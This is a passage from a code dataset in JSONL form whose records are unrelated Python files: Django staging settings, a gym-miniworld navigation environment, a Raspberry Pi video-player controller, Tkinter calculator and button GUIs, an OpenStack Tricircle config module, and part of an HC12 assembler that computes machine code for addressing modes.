0) \n + int(current_dict.get(key) or 0))\n break\n else:\n advanced_data.append(current_dict)\n\n save_table(advanced_data, keys, 'advanced_results.tsv')\n print(\"Data succesfully saved in advancedc_results.csv\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"python_app.py","file_name":"python_app.py","file_ext":"py","file_size_in_byte":4200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"486471815","text":"from .base import *\n\nDEBUG = False\nALLOWED_HOSTS = ['selling-online-overseas.export.staging.uktrade.io']\nADMINS = (('David Downes', 'david@downes.co.uk'),)\n\nRESTRICT_IPS = True\nALLOW_AUTHENTICATED = True\nALLOW_ADMIN = True\n\nSESSION_COOKIE_SECURE = False\nCSRF_COOKIE_SECURE = False\n","sub_path":"navigator/settings/staging.py","file_name":"staging.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"344647111","text":"import numpy as np\nimport math\nfrom gym import spaces\nfrom ..miniworld import MiniWorldEnv, Room\nfrom ..entity import Box, Ball, Key, Medkit, Cone, Building, Duckie\n\n# obs_width=80,\n# obs_height=60,\n# window_width=800,\n# window_height=600,\n\nclass Navigation(MiniWorldEnv):\n \"\"\"\n Room with multiple objects. The agent collects +1 reward for picking up\n each object. Objects disappear when picked up.\n \"\"\"\n\n def __init__(self, size=20, num_objs=5, **kwargs):\n assert size >= 2\n self.size = size\n self.num_objs = num_objs\n \n # Entity in the env\n self.ent_list = []\n\n super().__init__(\n max_episode_steps=400, obs_width = 128, obs_height = 128, window_width = 1280, window_height = 1280,\n **kwargs\n )\n\n # Reduce the action space\n self.action_space = spaces.Discrete(self.actions.move_back+1)\n \n\n\n def _gen_world(self):\n \n self.ent_list = []\n \n room = self.add_rect_room(\n min_x=0,\n max_x=self.size,\n min_z=0,\n max_z=self.size,\n wall_tex='brick_wall',\n floor_tex='asphalt',\n no_ceiling=True,\n )\n \n \n # Generate walls\n for i in range(3):\n #obj_type = self.rand.choice(obj_types)\n color = self.rand.color()\n ent = self.place_entity(Box(color=color, size=[0.2,2,6]))\n self.ent_list.append(ent)\n \n \n # Generate special objects\n obj_types = [Ball, Key, Medkit, Cone, Building, Duckie]\n\n for obj in range(self.num_objs):\n obj_type = self.rand.choice(obj_types)\n color = self.rand.color()\n\n if obj_type == Box:\n ent = self.place_entity(Box(color=color, size=[0.2,2,8]))\n #print(ent.pos)\n #print(ent.dir)\n if obj_type == Ball:\n ent = self.place_entity(Ball(color='blue'))\n if obj_type == Key:\n ent = self.place_entity(Key(color='yellow'))\n if obj_type == Building:\n ent = self.place_entity(Building(color='yellow'))\n if obj_type == Cone:\n ent = self.place_entity(Cone(color='yellow'))\n if obj_type == Medkit:\n ent = self.place_entity(Medkit(color='yellow'))\n if obj_type == Duckie:\n ent = self.place_entity(Duckie(color='yellow'))\n #self.ent_list.append(ent)\n \n \n ent = self.place_agent()\n self.ent_list.append(ent)\n \n #print('agent pos and dir:')\n #print(ent.pos)\n #print(ent.dir)\n\n self.num_picked_up = 0\n\n def step(self, action):\n obs, reward, done, info = super().step(action)\n \n info['ent_list'] = self.ent_list\n\n if self.agent.carrying:\n self.entities.remove(self.agent.carrying)\n self.agent.carrying = None\n self.num_picked_up += 1\n reward = 1\n\n if self.num_picked_up == self.num_objs:\n done = True\n\n return obs, reward, done, info\n","sub_path":"gym_miniworld/envs/navigation.py","file_name":"navigation.py","file_ext":"py","file_size_in_byte":3226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"385831415","text":"from threading import Thread\nfrom queue import Queue\nimport subprocess\n\nfrom pyautomator import BaseController, prompt\n\n\nclass VideoPlayerThread(Thread):\n def __init__(self, configuration, queue):\n Thread.__init__(self)\n self.configuration = configuration\n self.queue = queue\n self.player_process = None\n\n def run(self):\n while True:\n url = self.queue.get()\n\n if self.player_process:\n self.player_process.terminate()\n self.player_process = None\n\n if url:\n self.player_process = subprocess.Popen([\n self.configuration.player_path, self.configuration.get_options(),\n url, self.configuration.player_location]\n )\n\n\nclass VideoController(BaseController):\n class VideoPlayerConfiguration():\n def __init__(self, player_path='/home/pi/omxplayer-sync/omxplayer-sync',\n player_location='', master=True, slave=False):\n self.player_path = player_path\n self.player_location = player_location\n self.master = master\n self.slave = slave\n\n def set_master(self):\n self.master = True\n self.slave = False\n\n def set_slave(self):\n self.master = False\n self.slave = True\n\n def set_fullscreen(self):\n self.player_location = ''\n\n def get_options(self):\n opt = '-'\n if self.master:\n opt += 'm'\n else:\n opt += 'l'\n return opt\n\n def __init__(self):\n self.configuration = VideoController.VideoPlayerConfiguration(player_location='--win 395,360,1525,1050')\n self.player_thread = None\n self.player_queue = Queue()\n\n def get_mapping(self):\n mapping = {\n 'health': lambda: self.health(),\n 'play': lambda url, configuration: self.play(url, configuration),\n 'stop': lambda : self.stop(),\n }\n\n return mapping\n\n def play(self, url, options={}):\n if options.get('master', False):\n self.configuration.set_master()\n else:\n self.configuration.set_slave()\n\n if options.get('fullscreen', False):\n self.configuration.set_fullscreen()\n else:\n self.configuration.player_location='--win 395,360,1525,1050'\n\n if not self.player_thread:\n self.player_thread = VideoPlayerThread(self.configuration, self.player_queue)\n self.player_thread.start()\n self.player_queue.put(url)\n\n return \"Player started\"\n\n def stop(self):\n self.player_queue.put(None)\n\nif __name__ == '__main__':\n prompt(VideoController())\n","sub_path":"automator.py","file_name":"automator.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"347857398","text":"print(\"The current operands are Multiplication() Subtraction() Addition() Division() Exponent()\")\r\n\r\nMultiplication = (\"Multiplication ()\")\r\nSubtraction = (\"Subtraction ()\")\r\nAddition = (\"Addition ()\")\r\nDivision = (\"Division ()\")\r\nExponent = (\"Exponent ()\")\r\n\r\ndef Multiplication():\r\n print (\"Enter two numbers and I will multiply them\")\r\n\r\n # First variable\r\n astring = input (\"Enter the first number: \")\r\n a = int (astring)\r\n # Second variable\r\n bstring = input (\"Enter a second number: \")\r\n b = int (bstring)\r\n # Prints the output of the two numbers\r\n print (a, \"times\", b, \"equals\", a*b)\r\n \r\ndef Subtraction():\r\n print (\"Enter two numbers and I will subtract them\")\r\n\r\n # First variable\r\n cstring = input (\"Enter the first number: \")\r\n c = int (cstring)\r\n # Second variable\r\n dstring = input (\"Enter a second number: \")\r\n d = int (dstring)\r\n # Prints the output of the two numbers\r\n print (\"The difference of\", c, \"and\", d, \"is\", c-d)\r\n\r\ndef Addition():\r\n print (\"Enter two numbers and I will add them\")\r\n\r\n # First variable\r\n estring = input (\"Enter the first number: \")\r\n e = int (estring)\r\n # Second variable\r\n fstring = input (\"Enter a second number: \")\r\n f = int (fstring)\r\n # Prints the output of the two numbers\r\n print (\"The sum of\", e, \"and\", f, \"is\", e+f)\r\n \r\ndef Division():\r\n print (\"Enter two numbers and I will divide them\")\r\n\r\n # First variable\r\n gstring = input (\"Enter the first number: \")\r\n g = int (gstring)\r\n # Second variable\r\n hstring = input (\"Enter a second number: \")\r\n h = int (hstring)\r\n # Prints the output of the two numbers\r\n print (g, \"divided by\", h, \"is\", g/h)\r\n\r\ndef Exponent():\r\n print (\"Enter two numbers and I will time them by the exponent\")\r\n\r\n # First variable\r\n istring = input (\"Enter the exponent: \")\r\n i = int (istring)\r\n # Second variable\r\n jstring = input (\"Enter the second value: \")\r\n j = int (jstring)\r\n # Prints the output of the two numbers\r\n print (\"The exponent\", j, \"times\", i, \"is\", j**i)\r\n \r\n","sub_path":"Number.py","file_name":"Number.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"239374695","text":"# Copyright 2015 Huawei Technologies Co., Ltd.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"\nRoutines for configuring tricircle, largely copy from Neutron\n\"\"\"\nimport sys\n\nfrom oslo_config import cfg\nimport oslo_log.log as logging\nfrom oslo_policy import opts as policy_opts\n\nfrom tricircle.common import policy\nfrom tricircle.common import rpc\nfrom tricircle.common import version\n\n\nlogging.register_options(cfg.CONF)\nLOG = logging.getLogger(__name__)\n\npolicy_opts.set_defaults(cfg.CONF, 'policy.json')\n\n\ndef init(opts, args, **kwargs):\n # Register the configuration options\n cfg.CONF.register_opts(opts)\n\n cfg.CONF(args=args, project='tricircle',\n version=version.version_info,\n **kwargs)\n\n _setup_logging()\n _setup_policy()\n\n rpc.init(cfg.CONF)\n\n\ndef _setup_logging():\n \"\"\"Sets up the logging options for a log with supplied name.\"\"\"\n product_name = \"tricircle\"\n logging.setup(cfg.CONF, product_name)\n LOG.info(\"Logging enabled!\")\n LOG.info(\"%(prog)s version %(version)s\",\n {'prog': sys.argv[0],\n 'version': version.version_info})\n LOG.debug(\"command line: %s\", \" \".join(sys.argv))\n\n\ndef _setup_policy():\n\n # if there is valid policy file, use policy file by oslo_policy\n # otherwise, use the default policy value in policy.py\n policy_file = cfg.CONF.oslo_policy.policy_file\n if policy_file and cfg.CONF.find_file(policy_file):\n # just return here, oslo_policy lib will use policy file by itself\n return\n\n policy.populate_default_rules()\n\n\ndef reset_service():\n # Reset worker in case SIGHUP is called.\n # Note that this is called only in case a service is running in\n # daemon mode.\n _setup_logging()\n\n policy.reset()\n _setup_policy()\n","sub_path":"tricircle/common/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"653023386","text":"import tkinter as tk\n\n\nclass MyButtons:\n\n def __init__(self, master):\n frame = tk.Frame(master)\n frame.pack()\n\n self.printButton = tk.Button(frame, text=\"Print Message\", command=self.printMessage)\n self.printButton.pack(side=tk.LEFT)\n\n self.quitButton = tk.Button(frame, text=\"Quit\", command=frame.quit)\n self.quitButton.pack(side=tk.LEFT)\n\n def printMessage(self):\n print('This things works!!!')\n\n\nroot = tk.Tk()\nbyButts = MyButtons(root)\n\nroot.mainloop()","sub_path":"tk6.py","file_name":"tk6.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"132991881","text":"import re\n\npattern = r\"([\\w\\.-]+)@([\\w\\.-]+)(\\.[\\w\\.]+)\"\nstring = \"Please contact info@sololearn.com for assistance\"\n\nmatch = re.search(pattern, string)\nif match:\n\tprint(match.group())\n\n# In case the string contains multiple email addresses,\n# we could use the re.findall method instead of re.search,\n# to extract all email addresses.\n","sub_path":"regExp/email_extraction.py","file_name":"email_extraction.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"53908020","text":"from tkinter import Tk\nfrom tkinter import ttk\nfrom tkinter import StringVar\n\nfrom pyperclip import copy as to_clipboard\n\nfrom storage import Storage\nfrom core_logic import Calculate\n\n\nclass GUI(Tk):\n\n __operators: list = ['/', '*', '+', '-']\n\n def __init__(self):\n ''' View initializer '''\n super().__init__()\n # Main window properties\n self.title(\"PyCalc (v1.1)\")\n self.resizable(False, False)\n self.styler = ttk.Style()\n self._layout = ['*', '/', 'C', 'AC',\n '9', '8', '7', '-',\n '6', '5', '4', '+',\n '3', '2', '1', '+/-',\n '.', '0', 'Copy', '=']\n self._adv_layout = ['(', ')', '^', 'C',\n '*', 'sin', 'cos', 'tan',\n '/', 'asin', 'acos', 'atan',\n '+', 'x!', 'log', 'ln',\n '-', '\\u03C0', 'e', '=']\n\n # Inheriting from Storage for program logic\n self.logic = Storage()\n # Set General layout\n self.content = ttk.Notebook(master=self,\n padding=(0, 0, 0, 0),\n style='Outliner.TFrame')\n self.mainframe = ttk.Frame(self.content,\n relief='flat')\n self.mainframe2 = ttk.Frame(self.content)\n self.content.add(self.mainframe, text='Basic')\n self.content.add(self.mainframe2, text='Advanced')\n self.content.grid()\n self.label_text = StringVar()\n\n def default_style_settings(self):\n self.styler.configure(\"TLabel\",\n font='Times 20')\n self.styler.configure(\"TButton\",\n relief='flat',\n width='5',\n padding='10',\n background='bisque')\n self.styler.configure(\"EqualButton.TButton\",\n relief='falt',\n background='SeaGreen2',\n foreground='green4')\n self.styler.configure(\"EqualButton2.TButton\",\n relief='flat',\n background='firebrick1',\n foreground='green4')\n self.styler.configure(\"Outliner.TFrame\",\n background='snow2')\n\n def create_basic_display(self):\n ''' Create the display '''\n display_frame = ttk.Frame(self.mainframe, relief='flat')\n display_frame['borderwidth'] = 10\n display_label = ttk.Label(display_frame,\n textvariable=self.label_text)\n # grid above widgets\n display_frame.grid(row=0, column=0, columnspan=4, pady=5, padx=5)\n display_label.grid(row=0, column=0, columnspan=4)\n\n def create_basic_buttons(self):\n ''' Create buttons under keypad '''\n keypad = ttk.Frame(self.mainframe)\n button_objects = {\n button: ttk.Button(\n master=keypad,\n text=button,\n command=lambda button=button: self._button_invoke(\n button\n )\n )\n for button in self._layout\n }\n button_objects['AC']['command'] = lambda: self._button_invoke('A')\n button_objects['+/-']['command'] = lambda: self._button_invoke('i')\n button_objects['=']['style'] = 'EqualButton.TButton'\n\n keypad.grid()\n row, column = 0, 0\n for button in button_objects.values():\n button.grid(row=(row//4)+1, column=column % 4)\n row += 1\n column += 1\n\n def create_advanced_display(self):\n display_frame = ttk.Frame(self.mainframe2, relief='flat')\n display_frame['borderwidth'] = 10\n display_label = ttk.Label(display_frame,\n textvariable=self.label_text)\n # grid above widgets\n display_frame.grid(row=0, column=0, columnspan=4, pady=5, padx=5)\n display_label.grid(row=0, column=0, columnspan=4)\n\n def create_advanced_buttons(self):\n keypad = ttk.Frame(self.mainframe2)\n button_objects = {\n button: ttk.Button(\n master=keypad,\n text=button,\n command=lambda button=button: self._button_invoke(\n button)\n )\n for button in self._adv_layout\n }\n button_objects['=']['style'] = 'EqualButton2.TButton'\n\n keypad.grid()\n row, column = 0, 0\n for button in button_objects.values():\n button.grid(row=(row//4)+1, column=column % 4)\n row += 1\n column += 1\n\n def _button_invoke(self, bt):\n if bt == '=':\n ''' If button pressed is '=' '''\n to_display = 'Ans: '+self._get_answer(\n self.logic.show_storage_as_list()\n )\n if(len(to_display) > 17):\n FONT = 'Times '+str(20*17//len(to_display))\n ttk.Style().configure(\"TLabel\", font=FONT)\n else:\n ttk.Style().configure(\"TLabel\", font='Times 20')\n self.label_text.set(to_display)\n elif bt == 'Copy':\n self._copy_to_clipboard(self.logic.show_storage_as_list())\n else:\n self.logic.into_storage(bt)\n to_display = self.logic.show_storage()\n if(len(to_display) > 17):\n FONT = 'Times '+str(20*17//len(to_display))\n ttk.Style().configure(\"TLabel\", font=FONT)\n else:\n ttk.Style().configure(\"TLabel\", font='Times 20')\n self.label_text.set(to_display)\n\n def keyboard_event_binding(self):\n self.bind(\"\", self._callback)\n\n def _callback(self, e):\n if e.char.lower() in self._layout:\n self._button_invoke(e.char)\n elif e.char.lower() == 'c':\n self._button_invoke('Copy')\n elif e.char.lower() == 'a':\n self._button_invoke('A')\n elif e.char.lower() == 'i':\n self._button_invoke('i')\n elif e.char == '\\r':\n self._button_invoke('=')\n elif e.char.lower() in ('\\x08', 'b'):\n self._button_invoke('C')\n elif e.char.lower() == 'q':\n self.destroy()\n elif e.char == '(':\n self._button_invoke('(')\n elif e.char == ')':\n self._button_invoke(')')\n\n def _get_answer(self, inputs_as_list):\n calculate_instance = Calculate(inputs_as_list)\n return calculate_instance.calculate()\n\n def _copy_to_clipboard(self, inputs_as_list):\n to_clipboard(\"\".join(inputs_as_list))\n","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":6896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"294445436","text":"import re\n\nfrom f02_Variables import archivoEnsamblador, totalDireccionamiento, archivo_listado, tabla_simbolos\nfrom f02_Variables import SALTO_LINEA, PUNTO_COMA, ESPACIO, TABULADOR\nfrom Ensamblador.f01_Tabop import direccionamiento_particular_tabop\nfrom Ensamblador.f04_Evaluacion import evaluar_codop, evaluar_etiqueta, existe_codop_en_tabop, codopTieneOperando\nfrom Ensamblador.f05_Direccionamientos import direccionamiento_correspondiente\nfrom Ensamblador.f06Evaluar_Direccionamientos import validar_operando_directo_o_extendido\nfrom Ensamblador.f02_Variables import diccionario_codop\n\nexiste_end = False\nexiste_org = False\nlista_etiquetas = []\nname_archivo = ''\nDIR_INIC = 0\ntemp = ''\nCONTLOC = 0\ncodigoMaquina = 0\nANADIR_FINAL = 'w+'\nLECTURA = 'r'\nresultado_evaluacion = ''\n#----------------------------------------------------------------------------------\n# Esta funcion consiste en leer linea a linea el archivo de texto que contiene\n# las instrucciones en lenguaje ensabmlador, \n# y cada linea leida la guarada en la lista 'archivoEnsamblador' \n#----------------------------------------------------------------------------------\ndef leer_archivo_ensamblador(nombre_archivo):\n global name_archivo\n name_archivo = nombre_archivo\n\n try:\n with open(nombre_archivo, LECTURA) as archivo:\n for linea in archivo:\n if(len(linea) > 1):\n archivoEnsamblador.append(linea)\n except:\n print('%s (El sistema no puede encontrar el archivo especificado)' %nombre_archivo)\n \n\n#-----------------------------------------------------------------------------------------\n# Esta funcion consiste en pasar a evaluar cada linea de la lista 'archivoEnsamblador' \n# las instrucciones en lenguaje ensamblador, saltandose las lineas vacias \n#-----------------------------------------------------------------------------------------\ndef evaluar_lineas_ensamblador(diccionario_codop):\n global existe_end\n global archivo\n global temp\n contador = 0\n \n ANADIR_FINAL = 'w+'\n temp = name_archivo[0:2]+'tmp.txt'\n archivo_temporal = open(temp, ANADIR_FINAL)\n tabsim = open('tabsim.txt', ANADIR_FINAL)\n \n for linea in archivoEnsamblador:\n estaVacia = evaluar_lineas_sin_contenido(linea)\n if(not estaVacia):\n if(existe_end and contador == 0):\n print('\\n\\n:::::::::::::::::::::: ADVERTENCIA :::::::::::::::::::::::\\n ~ Las siguientes lineas no seran evaluadas ~\\n\\n') \n contador = 1\n evaluar_linea_ensamblador(linea, diccionario_codop, archivo_temporal, tabsim)\n # Al finalizar, si el 'END' no se encontro en el archivo, se marca error\n if(not existe_end):\n print('ERROR DE CODIGO DE OPERACION: No se encontro el END')\n print('\\nDIR_INIC = %d ::: CONTLOC = %d\\nLongitud en bytes = %d' %(DIR_INIC, CONTLOC, (CONTLOC-DIR_INIC)))\n archivo_temporal.close()\n tabsim.close()\n archivo_de_listado()\n archivo_tabsim()\n evaluar_lineas_de_listado()\n \ndef archivo_de_listado():\n try:\n with open(temp, LECTURA) as archivo:\n for linea in archivo:\n if(len(linea) > 1):\n archivo_listado.append(linea.split('|'))\n except:\n print('%s (El sistema no puede encontrar el archivo especificado)' %nombre_archivo)\n\ndef archivo_tabsim():\n try:\n with open('tabsim.txt', LECTURA) as archivo:\n for linea in archivo:\n if(len(linea) > 1):\n tabla_simbolos.append(linea.split('|'))\n except:\n print('%s (El sistema no puede encontrar el archivo especificado)' %nombre_archivo)\n \ndef evaluar_lineas_de_listado():\n print('-'*100)\n print('-'*100)\n for linea in archivo_listado: \n valor = linea[0]\n etiqueta = linea[1]\n codop = linea[2]\n operando = linea[3]\n direccionamiento = linea[4][:-1]\n \n print('VALOR = '+valor)\n print('ETIQUETA = '+etiqueta)\n print('CODOP = '+codop)\n print('OPERANDO = '+operando)\n \n if(direccionamiento.lower() == 'error'):\n #print('\\t\\tERROR: No es posible calcular el codigo maquina')\n None\n else:\n codigo_maquina = calcular_codigo_maquina(direccionamiento, codop, operando)\n print('CODIGO MAQUINA = '+codigo_maquina)\n print('\\n',direccionamiento)\n print()\n print('-'*50)\n print()\n \ndef calcular_codigo_maquina(info_direccionamiento, codop, operando):\n codigoMaquinaCalculado = ''\n codigoMaquinaTabop = ''\n valor_hexadecimal = ''\n registro_computadora = {'X':'00','Y':'01','SP':'10','PC':'11'}\n registro_valor = {'A':'00','B':'01','D':'10'}\n \n informacion = info_direccionamiento.split(', ')\n direccionamiento = informacion[0] \n #bytes_correspondientes = informacion[1] \n if(direccionamiento.lower() == 'inherente'):\n for direccionamientos in diccionario_codop[codop]:\n if(direccionamientos[2].lower() == 'inh'):\n codigoMaquinaTabop = direccionamientos[3]\n codigoMaquinaCalculado = codigoMaquinaTabop\n elif(direccionamiento.lower() == 'directo'):\n for direccionamientos in diccionario_codop[codop]:\n if(direccionamientos[2].lower() == 'dir'):\n codigoMaquinaTabop = direccionamientos[3]\n ###\n valor_decimal = convertir_operando_a_hexadecimal(operando)\n valor_hexadecimal = format(valor_decimal, '02X')\n codigoMaquinaCalculado = codigoMaquinaTabop + valor_hexadecimal\n elif(direccionamiento.lower() == 'extendido'):\n for direccionamientos in diccionario_codop[codop]:\n if(direccionamientos[2].lower() == 'ext'):\n codigoMaquinaTabop = direccionamientos[3]\n ###\n if(es_numerico(operando[1:])):\n valor_decimal = convertir_operando_a_hexadecimal(operando)\n valor_hexadecimal = format(valor_decimal, '04X')\n else:\n for etiqueta in tabla_simbolos:\n if(operando == etiqueta[0]):\n valor_hexadecimal = etiqueta[1][:-1]\n codigoMaquinaCalculado = codigoMaquinaTabop + valor_hexadecimal\n elif(direccionamiento.lower() == 'inmediato de 8 bits'):\n for direccionamientos in diccionario_codop[codop]:\n if(direccionamientos[2].lower() == 'inm'):\n codigoMaquinaTabop = direccionamientos[3]\n ###\n valor_decimal = convertir_operando_a_hexadecimal(operando[1:])\n valor_hexadecimal = format(valor_decimal, '02X')\n codigoMaquinaCalculado = codigoMaquinaTabop + valor_hexadecimal\n elif(direccionamiento.lower() == 'inmediato de 16 bits'):\n for direccionamientos in diccionario_codop[codop]:\n if(direccionamientos[2].lower() == 'inm'):\n codigoMaquinaTabop = direccionamientos[3]\n ###\n valor_decimal = convertir_operando_a_hexadecimal(operando[1:])\n valor_hexadecimal = format(valor_decimal, '04X')\n codigoMaquinaCalculado = codigoMaquinaTabop + valor_hexadecimal\n elif(direccionamiento.lower() == 'indizado de 5 bits'):\n for direccionamientos in diccionario_codop[codop]:\n if(direccionamientos[2].lower() == 'idx'):\n codigoMaquinaTabop = direccionamientos[3]\n partes_operando = operando.split(',')\n valor = partes_operando[0]\n if(valor == ''): valor = '0'\n registro = partes_operando[1]\n \n bytesRegistro = registro_computadora[registro.upper()]\n # \n if(int(valor) >= 0):\n valor_en_binario = format(abs(int(valor)), '#07b')[2:]\n else:\n valor_en_binario = format(abs(int(valor)), '#07b')[2:]\n valor_complementoa2 = complementoados(valor_en_binario)\n valor_en_binario = valor_complementoa2\n \n postbyteCode = bytesRegistro+'0'+valor_en_binario\n \n primerByte = hex(int(postbyteCode[0:4],2))[2:].upper()\n segundoByte = hex(int(postbyteCode[4:8],2))[2:].upper()\n \n codigoMaquinaCalculado = codigoMaquinaTabop + primerByte + segundoByte\n elif(direccionamiento.lower() == 'indizado de 9 bits'):\n for direccionamientos in diccionario_codop[codop]:\n if(direccionamientos[2].lower() == 'idx1'):\n codigoMaquinaTabop = direccionamientos[3]\n partes_operando = operando.split(',')\n valor = partes_operando[0]\n if(valor == ''): valor = '0'\n registro = partes_operando[1]\n bytesRegistro = registro_computadora[registro.upper()]\n ##\n z ='0'\n if(int(valor) >= 0):\n valor_hexadecimal = format(abs(int(valor)),'02X')\n s = '0'\n else:\n valor_resultante = int(valor) + 256\n valor_hexadecimal = format(valor_resultante,'02X')\n s = '1'\n \n postbyteCode = '111'+bytesRegistro+'0' + z + s\n \n primerByte = hex(int(postbyteCode[0:4],2))[2:].upper()\n segundoByte = hex(int(postbyteCode[4:8],2))[2:].upper()\n \n codigoMaquinaCalculado = codigoMaquinaTabop + primerByte + segundoByte + valor_hexadecimal\n \n elif(direccionamiento.lower() == 'indizado de 16 bits'):\n for direccionamientos in diccionario_codop[codop]:\n if(direccionamientos[2].lower() == 'idx2'):\n codigoMaquinaTabop = direccionamientos[3]\n partes_operando = operando.split(',')\n valor = partes_operando[0]\n if(valor == ''): valor = '0'\n registro = partes_operando[1]\n bytesRegistro = registro_computadora[registro.upper()]\n ##\n z = '1'\n s = '0'\n \n postbyteCode = '111'+bytesRegistro+'0' + z + s\n \n primerByte = hex(int(postbyteCode[0:4],2))[2:].upper()\n segundoByte = hex(int(postbyteCode[4:8],2))[2:].upper()\n \n valor_hexadecimal = format(abs(int(valor)),'04X')\n \n codigoMaquinaCalculado = codigoMaquinaTabop + primerByte + segundoByte + valor_hexadecimal\n \n elif(direccionamiento.lower() == 'indizado de pre decremento'):\n for direccionamientos in diccionario_codop[codop]:\n if(direccionamientos[2].lower() == 'idx'):\n codigoMaquinaTabop = direccionamientos[3]\n partes_operando = operando.split(',')\n valor = partes_operando[0]\n registro = partes_operando[1][1:]\n bytesRegistro = registro_computadora[registro.upper()]\n ##\n p = '0'\n \n valor_resultante = (int(valor)*-1) + 16\n valor_en_binario = format(valor_resultante, '#06b')[2:]\n \n postbyteCode = bytesRegistro+ '1' + p + valor_en_binario\n \n primerByte = hex(int(postbyteCode[0:4],2))[2:].upper()\n segundoByte = hex(int(postbyteCode[4:8],2))[2:].upper()\n \n codigoMaquinaCalculado = codigoMaquinaTabop + primerByte + segundoByte \n \n elif(direccionamiento.lower() == 'indizado de post decremento'):\n for direccionamientos in diccionario_codop[codop]:\n if(direccionamientos[2].lower() == 'idx'):\n codigoMaquinaTabop = direccionamientos[3]\n partes_operando = operando.split(',')\n valor = partes_operando[0]\n registro = partes_operando[1][:-1]\n bytesRegistro = registro_computadora[registro.upper()]\n ##\n p = '1'\n \n valor_resultante = (int(valor)*-1) + 16\n valor_en_binario = format(valor_resultante, '#06b')[2:]\n \n postbyteCode = bytesRegistro+ '1' + p + valor_en_binario\n \n primerByte = hex(int(postbyteCode[0:4],2))[2:].upper()\n segundoByte = hex(int(postbyteCode[4:8],2))[2:].upper()\n \n codigoMaquinaCalculado = codigoMaquinaTabop + primerByte + segundoByte \n \n elif(direccionamiento.lower() == 'indizado de pre incremento'):\n for direccionamientos in diccionario_codop[codop]:\n if(direccionamientos[2].lower() == 'idx'):\n codigoMaquinaTabop = direccionamientos[3]\n partes_operando = operando.split(',')\n valor = partes_operando[0]\n registro = partes_operando[1][1:]\n bytesRegistro = registro_computadora[registro.upper()]\n ##\n p = '0'\n \n valor_en_binario = format(int(valor)-1, '#06b')[2:]\n \n postbyteCode = bytesRegistro+ '1' + p + valor_en_binario\n primerByte = hex(int(postbyteCode[0:4],2))[2:].upper()\n segundoByte = hex(int(postbyteCode[4:8],2))[2:].upper()\n \n codigoMaquinaCalculado = codigoMaquinaTabop + primerByte + segundoByte\n \n elif(direccionamiento.lower() == 'indizado de post incremento'):\n for direccionamientos in diccionario_codop[codop]:\n if(direccionamientos[2].lower() == 'idx'):\n codigoMaquinaTabop = direccionamientos[3]\n partes_operando = operando.split(',')\n valor = partes_operando[0]\n registro = partes_operando[1][:-1]\n bytesRegistro = registro_computadora[registro.upper()]\n ##\n p = '1'\n \n valor_en_binario = format(int(valor)-1, '#06b')[2:]\n \n postbyteCode = bytesRegistro+ '1' + p + valor_en_binario\n primerByte = hex(int(postbyteCode[0:4],2))[2:].upper()\n segundoByte = hex(int(postbyteCode[4:8],2))[2:].upper()\n \n codigoMaquinaCalculado = codigoMaquinaTabop + primerByte + segundoByte\n \n elif(direccionamiento.lower() == 'indizado de acumulador'):\n for direccionamientos in diccionario_codop[codop]:\n if(direccionamientos[2].lower() == 'idx'):\n codigoMaquinaTabop = direccionamientos[3]\n \n partes_operando = operando.split(',')\n valor = partes_operando[0]\n registro = partes_operando[1]\n \n bytesRegistro = registro_computadora[registro.upper()]\n ##\n a = registro_valor[valor.upper()]\n postbyteCode = '111'+bytesRegistro+ '1' + a\n \n primerByte = hex(int(postbyteCode[0:4],2))[2:].upper()\n segundoByte = hex(int(postbyteCode[4:8],2))[2:].upper()\n \n codigoMaquinaCalculado = codigoMaquinaTabop + primerByte + segundoByte \n elif(direccionamiento.lower() == 'indizado indirecto de 16 bits'):\n for direccionamientos in diccionario_codop[codop]:\n if(direccionamientos[2].lower() == '[idx2]'):\n codigoMaquinaTabop = direccionamientos[3]\n \n partes_operando = operando.split(',')\n valor = partes_operando[0][1:]\n registro = partes_operando[1][:-1]\n \n bytesRegistro = registro_computadora[registro.upper()]\n ##\n postbyteCode = '111'+bytesRegistro+ '011'\n \n primerByte = hex(int(postbyteCode[0:4],2))[2:].upper()\n segundoByte = hex(int(postbyteCode[4:8],2))[2:].upper()\n \n codigoMaquinaCalculado = codigoMaquinaTabop + primerByte + segundoByte + format(int(valor), '04X')\n \n elif(direccionamiento.lower() == 'indizado de acumulador indirecto'):\n for direccionamientos in diccionario_codop[codop]:\n if(direccionamientos[2].lower() == '[d,idx]'):\n codigoMaquinaTabop = direccionamientos[3]\n \n partes_operando = operando.split(',')\n valor = partes_operando[0][1:]\n registro = partes_operando[1][:-1]\n \n bytesRegistro = registro_computadora[registro.upper()]\n ##\n postbyteCode = '111'+bytesRegistro+ '111'\n \n primerByte = hex(int(postbyteCode[0:4],2))[2:].upper()\n segundoByte = hex(int(postbyteCode[4:8],2))[2:].upper()\n \n codigoMaquinaCalculado = codigoMaquinaTabop + primerByte + segundoByte \n return codigoMaquinaCalculado\n\ndef convertir_operando_a_hexadecimal(operando):\n valor_decimal = 0\n if(operando[0] == 